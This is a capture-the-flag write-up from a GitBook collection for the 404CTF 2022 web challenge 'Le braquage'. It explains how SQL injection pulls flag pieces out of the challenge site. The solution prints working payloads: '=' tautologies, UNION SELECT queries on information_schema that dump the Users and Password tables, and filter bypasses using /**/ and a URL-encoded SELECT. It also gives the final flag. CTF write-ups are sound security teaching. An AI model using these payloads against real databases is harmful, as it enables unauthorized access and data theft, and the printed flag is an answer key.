Writeups
  • â„šī¸Infos
  • đŸ—“ī¸2021
    • DvCTF (to join DaVinciCode)
      • Crypto
        • Baby RSA
        • Ressaye
        • Unbreakable encryption
      • Forensics
        • Broken Portrait
        • Russian Dolls
        • Sus USB
      • Misc
        • Jus de Flag
        • Welcome
      • OSINT
        • Absolutely Nuts
      • Progra
        • Snoop's Mission
      • Reverse
        • Baby Reverse
        • Basic Cracking
        • Code Pyn
      • Steganography
        • Colorful Code
        • Hurt Your Eyes
        • Orchestra of Flags
        • Tyger
      • Web
        • Have I Been Pwned
        • What's Up ?
  • đŸ—“ī¸2022
    • DvCTF 2022
      • Crypto
        • Cwryptographic Owacle
        • Secure Or Not Secure
        • small weiner
      • Forensics
        • Very Bad Script
      • Misc
        • Data Leak
        • Going postal
        • The Hacker Man
      • OSINT
        • Elon Musk
        • Monkeey
        • Painting Spot
        • Welcome to the DaVinciCTF!
      • Pentest
        • DaVinci's Playlist : Part 1
        • DaVinci's Playlist : Part 2.5
        • DaVinci's Playlist : Part 2
      • Programming
        • Heaven's Gate
        • Sudoku
        • TicTacToe
      • Reverse
        • CryptoVault
        • Mine Game
        • Obfuscated
        • Peripheral Interface Controller XVI
      • Steganography
        • ICMP
        • The Arts of Details
        • Treasure
      • Warmup
        • EBG13
        • FrenchFlag
        • MP3
        • QmFzZTY0
        • RSA
        • Welcome
      • Web
        • CyberStreak v1.0
        • đŸŽĩ
    • picoCTF 2022
      • Challs WU
    • @HackDay - Qualifications
      • Crypto
        • Francis Bacon
        • Francs Maçons
        • Rotate-me!
        • Un message codÊ ?
      • Forensics
        • bad_timing_for_reversing
      • Hardware
        • Cubik'cipher
        • WebSDR
      • Reverse
        • Calling Conventions
        • Memory Investigation
      • Steganography
        • I can make pictures
        • J'ai perdu le flag :(
        • PokÊmons
        • Un coup de maÃŽtre
        • Un logo cachotier
      • Web
        • GIT!
        • Part. 1 - Uploads
        • Part. 2 - Old md5
        • Part. 3 - sudo python
    • 404CTF
      • Crypto
        • Un simple oracle [1/2]
        • Un simple oracle [2/2]
      • Misc
        • Je suis une thÊière
        • Pierre-papier-Hallebarde
        • GoGOLFplex
      • OSINT
        • À l'aube d'un Êchange
        • Collaborateur suspect
        • Equipement dÊsuet
      • Reverse
        • Mot de passe ?
      • Steganography
        • La plume à la main
        • PNG : Un logo obèse [1/4]
        • PNG : Drôles de chimères [2/4]
        • Toujours obèse [3/4]
      • Web
        • FichÊ JS
        • Le braquage
        • Du gÃĸteau
        • En construction !
    • Operation Kernel
      • Crypto
        • Scytale
      • Forensics
        • Research Paper
        • Excel Confidential
      • Reverse
        • CryptoLocker
        • What_If_CryptoLocker
      • Social Engineering
        • Pour vivre secure vivons cachÊ
        • Pour vivre secure vivons cachÊ Part 2
      • Stegano
        • AudioSpectre
        • Datacenter
        • Takazume
      • WEB
        • Research paper blog
        • SQL Project 1
        • SQL Project 2
        • SQL Project 3
        • Tenue de soirÊe requise
  • đŸ—“ī¸2023
    • 404CTF 2023
      • RÊsultats
      • Analyse forensique
        • PÃĒche au livre
        • Le Mystère du roman d'amour
        • Les Mystères du cluster de la Comtesse de SÊgur [1/2]
        • Lettres volatiles
        • Note de bas de page
      • Cloud
        • Le Sot
        • Le Cluster de Madame Bovary
        • Harpagon et le magot
        • Les nuages menaçants 1/3
        • Les nuages menaçants 2/3
      • Cryptanalyse
        • Recette
        • ASCON Marchombre
      • Divers
        • Bienvenue
        • Exemple de connexion à distance
        • Discord
        • À vos plumes !
      • Exploitation de binaires
        • Je veux la lune !
      • Programmation
        • L'Inondation
        • Des mots, des mots, des mots
      • Radio-FrÊquence
        • Navi
        • Avez-vous vu les cascades du hÊrisson ?
        • Le Plombier du cÃĸble
        • Ballistic Missile Submarine
      • Renseignement en sources ouvertes
        • Le Tour de France
        • Les OSINTables [1/3]
        • Un vol ?
        • L'Ãĸme d'un poète et le coeur d'une femme [1/4]
        • L'Ãĸme d'un poète et le coeur d'une femme [2/4]
        • L'Ãĸme d'un poète et le coeur d'une femme [3/4]
        • L'Ãĸme d'un poète et le coeur d'une femme [4/4]
      • RÊtro IngÊnierie
        • Le Divin Crackme
        • L'Inspiration en images
      • SÊcuritÊ MatÊrielle
        • Un courrier suspect
        • Un rÊveil difficile
      • StÊganographie
        • Odobenus Rosmarus
        • L'Œuvre
        • Les FÊlicitations
        • En Profondeur
        • Le Rouge et le vert, avec un soupçon de bleu
      • Web
        • Le Loup et le renard
        • L'AcadÊmie du dÊtail
        • La Vie Française
        • Fuite en 1791
        • L'Épistolaire moderne
        • Chanson d'Inde
      • Web3
        • Art
        • L'Antiquaire, tÃĒte en l'air
Powered by GitBook
On this page

Was this helpful?

  1. 2022
  2. 404CTF
  3. Web

Le braquage

PreviousFichÊ JSNextDu gÃĸteau

Last updated 2 years ago

Was this helpful?

Category: Web - Points: 874 - Difficulty : Facile - Solves : 376

Description: UTILISER SQLMAP SUR CE CHALLENGE-CI OU TOUT AUTRE CHALLENGE CONDUIRA A UN BAN Vous ÃĒtes sur une affaire de cambriolage. D’après vos informations, un criminel surnommÊ TITI a prÊvu une rencontre avec ses complices pour prÊparer son prochain casse. Heureusement, votre Êquipe est parvenu à trouver un site qu’ils utilisent. Ce site leur permet de communiquer et d’Êchanger des lieux de rendez-vous ainsi que des fausses identitÊs. A vous d’exploiter cette base de donnÊes pour obtenir des informations sur le suspect et son opÊration : nom, prÊnom, adresse visÊe, date du casse, heure du casse, tÊlÊphone, mot de passe. Les diffÊrents morceaux de flag sont sous la forme : 404CTF{Nom},404CTF{PrÊnom},404CTF{Adresse},404CTF{Date},404CTF{Heure},404CTF{TÊlÊphone},404CTF{Mdp}

Le flag final est la concatÊnation de tous les morceaux sans espace : 404CTF{NomPrÊnomTÊlÊphoneAdresseDateHeureMdp

Solution: To solve this challenge you need to send SQL injection at the good places. On the website, there are 3 pages :

On the first page (Discussions) there are 2 inputs :

On the second page (Informations) there is 1 input :

And on the third page (Rencontres) there is 1 input :

At first, we try to send '=' in all inputs to try to get infos :

We get 4 parts of the final flag.

Now we try to find the 3 last parts in the 2nd and 3rd page. We can start with the 2nd page : TITI ' UNION SELECT null, table_name FROM information_schema.tables # and get all tables name

TITI ' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name = "Users" # and we get all columns of the Users table

TITI ' UNION SELECT nom, prenom FROM Users # and we get the content of the Users table

Now we have 6 parts of the final flag and we need to search the injection for the 3rd page : ' UNION SELECT null, null, table_name FROM information_schema.tables ;# and we get an error because we can't insert space into our injection :

So to bypass the space we replace them by /**/ : '/**/UNION/**/SELECT/**/null,/**/null,/**/table_name/**/FROM/**/information_schema.tables/**/;#. But now we get an error because we can't insert SELECT (in clear) into our injection :

So to bypass SELECT we replace them by %53%45%4c%45%43%54 who is the ASCII conversion of the word.

Now with these all bypasses we can start to find the flag : '/**/UNION/**/%53%45%4c%45%43%54/**/null,/**/null,/**/table_name/**/FROM/**/information_schema.tables/**/;# and get all tables name

We have all parts of the flag and we can assemble them to get the final flag.

🚩 FLAG
 404CTF{VereuxUnGorfou014576945621ruedeskiwis2022-07-1401hDuMatinGorfousAuPouvoir}

'/**/UNION/**/%53%45%4c%45%43%54/**/null,/**/null,/**/column_name/**/FROM/**/information_schema.columns/**/WHERE/**/table_name/**/=/**/"Password";# and we get all columns of the Password table

'/**/UNION/**/%53%45%4c%45%43%54/**/null,/**/id,/**/mdp/**/FROM/**/Password;# and we get the content of the Password table

đŸ—“ī¸
https://le-braquage.404ctf.fr
discussion1_flag
rencontre1
information1
rencontre1_flag1
mainPage
information1_1
information1_2
discussion1
information1_flag
rencontre1_erreur1
rencontre1_erreur2
rencontre1_2
rencontre1_flag2
rencontre1_1